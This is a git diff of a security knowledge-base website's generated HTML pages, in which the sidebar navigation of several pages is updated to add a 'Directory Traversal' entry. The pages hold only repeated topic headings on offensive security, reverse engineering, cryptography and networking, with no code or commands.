      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Reconnaissance/index.html b/docs/Reconnaissance/index.html index 2ce83dcc..18411863 100644 --- a/docs/Reconnaissance/index.html +++ b/docs/Reconnaissance/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Assembly Programming/index.html b/docs/Reverse Engineering/Assembly Programming/index.html index b0ff8b2c..aadfad79 100644 --- a/docs/Reverse Engineering/Assembly Programming/index.html +++ b/docs/Reverse Engineering/Assembly Programming/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html index 745c8099..fae77703 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
